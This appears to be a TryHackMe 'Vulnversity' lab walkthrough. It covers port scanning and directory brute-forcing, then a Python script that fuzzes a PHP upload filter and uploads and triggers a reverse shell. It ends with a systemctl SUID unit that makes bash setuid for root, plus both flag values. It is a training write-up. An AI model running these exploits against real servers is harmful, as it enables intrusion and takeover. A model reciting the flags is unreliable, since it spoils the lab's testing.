THM_Vulnversity_Walkthrough
Vulnversity Walkthrough TryHackMe
performed by: jb-williams
Reconnaissance
The room first asks you to search online for an nmap resource (a cheat sheet). I came across this one, which seemed really useful:
https://www.stationx.net/nmap-cheat-sheet/
The First Real Question
Scan the box, how many ports are open?
I like to build up a chain of commands for most boxes.
- While scanning, I also like to create a file that holds just the numeric port values for later use. My command came out like this (the output directory for -oA has to exist first, and the grep is anchored to the port lines so that script output which happens to contain the word "open" does not inflate the count):
mkdir -p nmap && nmap -v -T4 -sV -sC -oA nmap/initial 10.10.124.14 && grep -E '^[0-9]+/(tcp|udp) +open' nmap/initial.nmap | cut -d'/' -f1 | tee nmap/ports.txt | wc -l
- Number of ports open: 6
What version of the squid proxy is running on the machine?
grep -i "squid" nmap/initial.nmap | awk '{print $NF}'
- Version of Squid proxy: 3.5.12
How many ports will nmap scan if the flag -p-400 is used?
- Looking at man page or online resource:
400
Using the nmap flag -n what will it not resolve?
- Looking at man page or online resource:
DNS
What is the most likely operating system this machine is running?
grep -i "os" nmap/initial.nmap
- The scan was run without -O, so the hint comes from the service banners that -sV pulled (OpenSSH and Apache both report their distro build). Quickly scanning the output, you can see that Ubuntu is listed most.
What port is the web server running on?
grep -i "http" nmap/initial.nmap
- The HTTP server is on port: 3333
It's important to always do your reconnaissance thoroughly before progressing. Knowing every open service matters, since each one is a potential point of exploitation. Don't forget that ports in the higher range might be open too: the default scan only covers the top 1000 ports, so always follow up with a scan of the remaining ports (even if you leave it running in the background while you move on).
Locating directories using GoBuster
Using gobuster:

GoBuster flag | Description
---|---
-e | Print the full URLs in your console
-u | The target URL
-w | Path to your wordlist
-U and -P | Username and password for HTTP basic auth
-p | Proxy to use for requests
-c | Specify a cookie for simulating your auth
What is the directory that has an upload form page?
gobuster dir -u http://10.10.124.148:3333 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster.txt -t 15
I like using feroxbuster, and it let me know more info, especially about the directory path, sooner:
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -e -u http://10.10.124.148:3333/
- The directory that has an upload form page is: /internal/
- Also found: /internal/uploads (they don't ask for this one, but it's important to know about later)
Compromise the webserver
After finding the form to upload files:
What file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.
- First, trying to upload a reverse shell, reverseshell.php, was blocked, so the filter rejects the .php extension.
- The room walks you through using Burp to fuzz the upload form; I wrote a Python script to fuzz for me.
- URL for the room to follow the Burp walkthrough:
- After testing different PHP file extensions (fuzzing the upload form with curl, Python, Burp and ZAP), you come across this one working: .phtml
- Download this PHP reverse shell: downloadLink
php-reverse-shell.phtml
- Edit the file, changing the IP to your tun0 THM IP and the desired port.
- Set up a listener on the port specified in the reverse shell, e.g.:
nc -lnvp 4444
- Upload the reverse shell through the upload form and navigate here to execute the payload:
http://<IP>:3333/internal/uploads/php-reverse-shell.phtml
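As an added example (not the author's script and not from the room), the following Python does what the fuzzing and upload steps above describe: it POSTs a harmless probe under each alternate PHP extension, classifies the form's answer, and can then upload the .phtml shell and request it from /internal/uploads/ to fire it. It assumes the form at /internal/ takes a multipart field named file plus a submit field, and that a rejected upload answers with text containing "Extension not allowed"; those details are assumptions, so check one response by hand (curl or Burp) before trusting the verdicts.

```python
#!/usr/bin/env python3
"""Fuzz a PHP upload filter for accepted extensions, then upload and trigger a payload.

Added example, stdlib only. Assumed (not verified here): the form posts a multipart
field named "file" plus a "submit" field, says "Extension not allowed" on rejection,
and stores accepted files under /internal/uploads/.
"""
import sys
import uuid
import urllib.error
import urllib.request
from typing import Dict, List, Optional, Tuple

# Alternate PHP extensions a naive blacklist tends to miss (the page found .phtml accepted).
PHP_EXTENSIONS = ["php", "php3", "php4", "php5", "php7", "phps", "phar", "phtml", "pht", "phtm"]

# Response markers, assumed; adjust after looking at one real response.
BLOCKED_MARKERS = ("extension not allowed", "not allowed")
SUCCESS_MARKERS = ("success",)


def candidate_filenames(stem: str, extensions: List[str] = PHP_EXTENSIONS) -> List[str]:
    """'shell' -> ['shell.php', 'shell.php3', ...]."""
    return [f"{stem}.{ext}" for ext in extensions]


def build_multipart(file_field: str, filename: str, content: bytes,
                    fields: Optional[Dict[str, str]] = None,
                    boundary: Optional[str] = None) -> Tuple[bytes, str]:
    """Hand-roll a multipart/form-data body; returns (body, Content-Type header value)."""
    boundary = boundary or "----fuzz" + uuid.uuid4().hex
    parts = []
    for name, value in (fields or {}).items():  # plain text fields first
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())
    parts.append((f'--{boundary}\r\n'
                  f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"\r\n'
                  'Content-Type: application/octet-stream\r\n\r\n').encode() + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())  # closing delimiter
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def classify(status: int, body: str) -> str:
    """Map an upload response to 'blocked', 'accepted' or 'unknown(<status>)'."""
    text = body.lower()
    if any(m in text for m in BLOCKED_MARKERS):
        return "blocked"
    if any(m in text for m in SUCCESS_MARKERS):
        return "accepted"
    return f"unknown({status})"


def post_upload(form_url: str, filename: str, content: bytes, timeout: float = 10.0) -> Tuple[int, str]:
    """POST one file to the form; returns (status, body) even for 4xx/5xx answers."""
    body, ctype = build_multipart("file", filename, content, fields={"submit": "Submit"})
    req = urllib.request.Request(form_url, data=body, method="POST",
                                 headers={"Content-Type": ctype, "Content-Length": str(len(body))})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def fuzz_extensions(form_url: str, stem: str = "probe") -> Dict[str, str]:
    """Try each extension with a harmless PHP body and record the filter's verdict."""
    probe = b"<?php echo 'ext-ok'; ?>"
    return {name: classify(*post_upload(form_url, name, probe)) for name in candidate_filenames(stem)}


def trigger(base_url: str, filename: str, timeout: float = 5.0) -> int:
    """GET the uploaded file so the server executes it; 0 means the request hung (shell connected)."""
    req = urllib.request.Request(f"{base_url}/internal/uploads/{filename}")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except OSError:  # URLError and socket timeouts both derive from OSError
        return 0


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} http://<IP>:3333 [php-reverse-shell.phtml]")
    base = sys.argv[1].rstrip("/")
    form = f"{base}/internal/"
    for name, verdict in fuzz_extensions(form).items():
        print(f"{name:14s} {verdict}")
    if len(sys.argv) > 2:  # upload the real payload and request it (start nc first)
        payload = sys.argv[2]
        with open(payload, "rb") as fh:
            status, text = post_upload(form, payload.rsplit("/", 1)[-1], fh.read())
        print("upload:", classify(status, text))
        print("trigger:", trigger(base, payload.rsplit("/", 1)[-1]) or "request held open, check your listener")
```

Start the nc listener before passing the payload path: the GET that triggers the shell stays open while the shell is connected, which is why a timeout on that request is reported as the success case rather than an error.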
What is the name of the user who manages the webserver?
- Once on the machine, ls the /home directory and you see the user: bill
What is the user flag?
- ls /home/bill and you see user.txt
cat /home/bill/user.txt
- The contents of user.txt: 8bd7992fbe8a6ad22a63361004cfcedb
Privilege Escalation
Per THM:
In Linux, SUID (set owner user ID upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permissions of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password it needs to write to the shadow file, which you do not have access to but root does, so it runs with root privileges to make the right changes.
On the system search for all SUID files. What file stands out?
- I tend to use this find command to search for SUID binaries:
find / -type f -perm -4000 2>/dev/null
- Using my own system as a rough reference, I saw this one looking fairly unusual:
/bin/systemctl
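The same comparison, as an added example in Python (not from the room or the author's notes): walk the filesystem for SUID/SGID regular files, then print only those absent from a baseline of what a clean install carries, which is what "using my own system as a reference" does by eye. The baseline here is a constructed, shortened list of Ubuntu 16.04 defaults and is an assumption; build your own from a clean image of the same release before trusting the diff.

```python
#!/usr/bin/env python3
"""Find setuid/setgid files and flag the ones a stock install would not have.

Added example. BASELINE_UBUNTU_1604 is a constructed, abbreviated list of SUID/SGID
paths normally present on Ubuntu 16.04 and is an assumption for illustration only.
"""
import os
import stat
import sys
from typing import Iterable, List, Set

BASELINE_UBUNTU_1604 = {
    "/bin/fusermount", "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/su", "/bin/umount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/wall",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
}

# Pseudo-filesystems that are noise for this purpose.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_setid(mode: int) -> bool:
    """True for a regular file carrying the SUID or SGID bit (find -type f -perm -4000 -o -perm -2000)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setid(root: str = "/") -> List[str]:
    """Walk root without following symlinks; unreadable entries are skipped, like 2>/dev/null."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink's own mode never has the bits we want
            except OSError:
                continue
            if is_setid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def unusual(paths: Iterable[str], baseline: Set[str] = BASELINE_UBUNTU_1604) -> List[str]:
    """Paths not in the baseline, sorted: the ones worth looking up on GTFOBins."""
    return sorted(set(paths) - baseline)


def describe(path: str) -> str:
    """ls -l style summary: symbolic mode, owner uid, path."""
    st = os.lstat(path)
    return f"{stat.filemode(st.st_mode)} uid={st.st_uid} {path}"


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for p in unusual(find_setid(root)):
        print(describe(p))
```

Run it on the target (or pipe the output of the find command above through unusual() instead) and /bin/systemctl is the line left over once the expected Ubuntu binaries are subtracted. Only root-owned entries matter for getting root, so check the uid in the output before spending time on a hit.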
Become root and get the last flag (/root/root.txt)
- Navigating to GTFOBins and searching for that binary.
- I took the Sudo (b) one and modified it:
TF=$(mktemp).service
# a oneshot unit that systemd (running as root) will execute for us: make bash SUID
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > "$TF"
# because systemctl is SUID root, an unprivileged user can register and start the unit
/bin/systemctl link "$TF"
/bin/systemctl enable --now "$TF"
- I literally copy/pasted that chunk into my terminal and ran it.
- Then I ran bash -p to escalate to root (-p tells bash to keep the effective uid instead of dropping it). Note that this leaves /bin/bash SUID on the box; chmod -s /bin/bash undoes it when you're done.
- As root you can ls the /root directory: ls /root
and see root.txt
- Cat out root.txt:
cat /root/root.txt
- The contents of root.txt: a58ff8579f0a9270368d33a9966c7fd5
written and performed by jb-williams - github
Tags: linux pentest escalation SUID scanning burp gobuster feroxbuster tryhackme vulnversity walkthrough file-upload php
2023-04-11 15:50